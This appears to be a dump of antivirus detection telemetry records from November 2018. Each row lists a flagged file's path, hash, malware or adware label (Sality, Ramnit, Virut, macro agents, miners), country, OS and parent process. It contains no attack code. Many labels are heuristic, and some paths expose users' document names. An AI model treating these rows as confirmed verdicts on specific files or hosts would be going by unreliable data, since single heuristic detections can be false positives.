  Row(detection=Row(filename='avscan-20181102-002446-474ac043', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002446-474AC043', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gag.dll', filepath='ProgramFilesDir/[PluginsDir]/gag.dll', filesize=128000, name='PUA/Outbrowse.Gen.#M2.#R5697'), hash='1637407ac610ce29ed4f4f1c6da3cb8f683c502374d0638389fe3c8e2bdc7c91', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T19:01:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T08:19:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-221615-d64a8bcb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_22583aa6\\AVSCAN-20181101-221606-D462C72B\\AVSCAN-20181101-221615-D64A8BCB', filesize=1920000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='4902b05008f9af462000f77cfbacea19d9492e22cca80cc5c9f07d2c5701de32', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:16:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\Program Files\\Aurora3D\\Maker3D\\unins000.exe', filesize=22528000, name='W32/Sality.AT.#M1.#R1'), hash='2eb0e7c909557cd71d15f7f2bbc41058a26d7660b62fc318cbe36b84a761c11c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:54:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T19:45:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwr_insert_bar_objects_io_06.html', filepath='C:\\Program Files\\Common Files\\Adobe\\Help\\en_US\\Dreamweaver\\9.0_Extending\\dwr_insert_bar_objects_io_06.html', filesize=116000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='6a2db1ade29fe7e745d7cf030d0bfa768c501fa78c6fd14856670bf02d28256f', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T09:09:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa1216.28458\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa1216.28458\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:36:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T12:13:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='thống kê vụ việc không khởi tố.exe', filepath='H:\\\xa0\\USB__Data\\USB__Data\\thống kê vụ việc không khởi tố.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='30a90e52ae113aef6cee733c2ae574ae8d3523e80d83efa68668b5ccfa5d555a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-01T22:02:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00004286', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp00004286', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T15:38:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tnkge.dll', filepath='D:\\MariaDB\\lib\\plugin\\tnkge.dll', filesize=64000, name='W32/Ramnit.CD.#M1.#R1'), hash='27bcd2ea9456476b7ab0881ee7704d030721b09856caa463554d383754cd40e6', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T22:29:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T09:06:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e12f2445-2c54-42b7-9128-1c62ced65875.dll', filepath='\\\\?\\C:\\Program Files (x86)\\e46b1b7a-cf11-45d5-8c30-72780a410319\\e12f2445-2c54-42b7-9128-1c62ced65875.dll', filesize=192000, name='HEUR/AGEN.1030354.#M1.#R1'), hash='09f6f48be71cc07cb5dc7f8c32106682eaad612caa2e144882101679113931ce', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:34:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T11:09:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa3368.31320\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa3368.31320\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T19:08:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-200230-3b41a73a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d5206d7\\AVSCAN-20181101-200208-38EF5D44\\AVSCAN-20181101-200230-3B41A73A', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:02:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T17:32:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='D:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T20:51:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\Program Files\\Aurora3D\\Maker3D\\unins000.exe', filesize=22528000, name='W32/Sality.AT.#M1.#R1'), hash='2eb0e7c909557cd71d15f7f2bbc41058a26d7660b62fc318cbe36b84a761c11c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:50:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-090724-10fe4f0b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181101-224049-77016E40\\AVSCAN-20181102-090724-10FE4F0B', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:32:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105028-6018c990', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b060310d\\AVSCAN-20181101-104820-4D7C096B\\AVSCAN-20181101-105028-6018C990', filesize=192000, name='TR/Rogue.192000.9.#M1.#R1'), hash='767e7cef883679bed2576504ca4cf079d8cf48360f85e2d79fc4d41f73a2610e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:50:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-233017-9b9d91d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_68e769ac\\AVSCAN-20181101-232858-92EB083E\\AVSCAN-20181101-233017-9B9D91D8', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:30:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152503-ac6caab6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152503-AC6CAAB6', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:25:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rqauwqqe.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\rqAuWqQe.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151620-482f8af3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151620-482F8AF3', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:16:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ebbc8b3ce6d728f48a645e08906b88bdbeba7d404273ec907d558accece4d25c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-18\\EBBC8B3CE6D728F48A645E08906B88BDBEBA7D404273EC907D558ACCECE4D25C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ebbc8b3ce6d728f48a645e08906b88bdbeba7d404273ec907d558accece4d25c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:30:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='f3c4fb4e2cd133d108fb8515d34ef93743bd13b5a3040555013558e76c12e773', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='33e5.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\33E5.tmp', filesize=896000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='f1fdf5a690618f86263b03a073592cd58c12fbca0354d113ecb97bdfe419cc72', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='đề xuất kinh phí.exe', filepath='H:\\\xa0\\USB__Data\\USB__Data\\đề xuất kinh phí.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='b91a3cfe962e755cd293d2527015eea1da0b49acb1b8a3828377fc7ae92ab308', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack_pes_2019_32d298d.exe', filepath='F:\\CRACK_PES_2019_32D298D.EXE', filesize=3136000, name='HEUR/AGEN.1020138.#M1.#R1'), hash='a5de74fd8225883fb2e96665365419f20b7594280238b32190618b2705f680e3', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T23:43:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='halyuyka halina.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 574309\\HALYUYKA HALINA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:28:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154608-cdc5cab3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154555-CB8F528F\\AVSCAN-20181101-154608-CDC5CAB3', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145843-7dba730f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-145843-7DBA730F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145949-9288dbc6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36c54126\\AVSCAN-20181101-145905-8A15D273\\AVSCAN-20181101-145949-9288DBC6', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:59:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ginnastica perineale.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\SCHEDE CORSI SOCIOSANITARI\\GINNASTICA PERINEALE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:16:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182618-36805c7b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_836b6955\\AVSCAN-20181101-182243-1213B2D6\\AVSCAN-20181101-182618-36805C7B', filesize=2944000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='c76d46252236f45d25880eb78c70ba71eae66004af87257fc1541dcf6d680206', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:26:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ps2pdf995.exe', filepath='D:\\BKP HD PROBLEMA\\Desktop\\Lixo\\ps2pdf995.exe', filesize=8388000, name='W32/Neshta.A.#M1.#R1'), hash='9f0b2c81ae468ee620aea67b2d9be6f083ac61f939b01554bca3372a11acb3b1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:24:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-153804-8a082ffd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-153758-8985C800\\AVSCAN-20181101-153804-8A082FFD', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='b8cfbec4d35a61e9d497865523d254246edf4b602a65c7bdd3b440608d5e1331', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:38:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fomer', filepath='C:\\WINDOWS\\SYSTEM32\\TASKS\\Yahoo! Powered fomer', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='9181846258d386386a8495c47d25fa0d650b9c3d89a88aefa19fed328dee4dbe', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:13:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095236-5c5aa133', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095236-5C5AA133', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:52:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0002626.exe', filepath='D:\\Bo PM Phong Canh\\Du Lieu Cu truoc\\Chu 4 ngo\\gho\\du lieu o D\\System Volume Information\\_restore{3EEE7538-FED8-4189-B1EA-9ED94E4594E9}\\RP12\\A0002626.EXE', filesize=20992000, name='HEUR/AGEN.1006275.#M1.#R1'), hash='9adf698d3283bd72e49327542059c7dad7a59c3b2c32aa50d60d3155606b9719', metadata=Row(cmdline='-r', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 17.0.0\\avp.exe', parentsize=241544, timestamp='2018-11-01T07:58:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aa1af21a06a3b7d53ecdfeffed1d395241d8b0eeb82ed7a49deb9792ad0942e8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\AA1AF21A06A3B7D53ECDFEFFED1D395241D8B0EEB82ED7A49DEB9792AD0942E8', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='aa1af21a06a3b7d53ecdfeffed1d395241d8b0eeb82ed7a49deb9792ad0942e8', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:16:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e4f6d5004eb9e119e76a218abd7eceece5afcd53f211aaa6cd924287a2cc6148', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\E4F6D5004EB9E119E76A218ABD7ECEECE5AFCD53F211AAA6CD924287A2CC6148', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e4f6d5004eb9e119e76a218abd7eceece5afcd53f211aaa6cd924287a2cc6148', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:47:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-153008-11d33c87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0cad3524\\AVSCAN-20181104-152950-0EFFC20A\\AVSCAN-20181104-153008-11D33C87', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:30:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0002408d', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0002408d', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:42:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='g:\\\xa0\\edius_v5.50_full\\edius\\setup.exe', filesize=1024000, name='W32/Expiro.NU.#M1.#R1'), hash='572f6ebb6f36650e0797ce3603c309b613bc3e5d1e8892bfa55d1558b6bcb015', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:42:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3579093\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\aTube_Catcher_3719905477.exe', parentsize=2553608, timestamp='2018-11-04T23:09:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:31:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='base case.xls', filepath='D:\\Files\\arsiv\\old_users\\handeg\\BELGELER\\Şirket Belgeleri\\YALOVA DOCS\\EXCEL FILES\\BUDGET\\ARAMA DOCS\\Base Case.xls', filesize=320000, name='X97M/Laroux.FK.#M1.#R1'), hash='aac90047daf125765ec236162c96847e9cfa9278a049a65823d0d9c9d2d2db2c', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:13:06Z'), dt=datetime.date(2018, 11, 4)),
